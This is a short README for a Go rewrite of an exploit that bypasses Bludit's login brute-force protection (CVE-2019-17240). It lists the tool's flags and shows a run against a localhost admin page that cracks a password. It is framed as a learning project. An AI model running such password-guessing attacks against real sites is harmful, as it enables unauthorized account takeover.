Bludit <= 3.9.22 - Bruteforce Mitigation Bypass
This is small project where I rewrite this python script into golang. Purpose of this project was to learn Golang and understand how this exploit work.
Usage
$ ./brutepass -sdasds
flag provided but not defined: -sdasds
Usage of ./brutepass:
-c int
Threads (default 5) (default 5)
-l string
Hostname eg... http://127.0.0.1/admin/login.php
-p string
Password file
-u string
Enter username
Except threads flag all other flags are mandantory.
$ ./cve-2019-17240 -p pass.txt -u admin -l "http://127.0.0.1/admin/login.php"
Total requests sent: 10
Total requests sent: 20
Total requests sent: 30
Total requests sent: 40
Total requests sent: 50
Total requests sent: 60
Total requests sent: 65
==========Password Cracked=============
Password: Password